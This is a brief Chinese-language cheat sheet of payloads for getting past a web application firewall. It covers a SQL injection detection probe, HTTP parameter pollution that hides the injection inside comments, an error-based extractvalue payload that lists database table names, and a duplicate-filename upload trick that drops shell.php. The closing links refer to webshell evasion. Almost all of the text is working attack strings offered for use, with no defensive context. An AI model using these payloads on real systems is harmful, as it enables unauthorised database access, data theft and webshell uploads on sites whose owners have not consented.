sql注入bypass
判断是否存在注入
payload
?id=2' and -ascii('a')=-abs('-97') --+
hhp参数污染
payload
?id=1' /*&id=1' order by 99 --+ */
报错注入payload
?id=1' /*&id=-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = database())))) --+ */
文件上传bypass
payload:
Content-Disposition: form-data; name="file"; filename= ; filename="shell.php"
参考链接:
webshell 免杀
文件上传免杀
全方位绕过安全狗2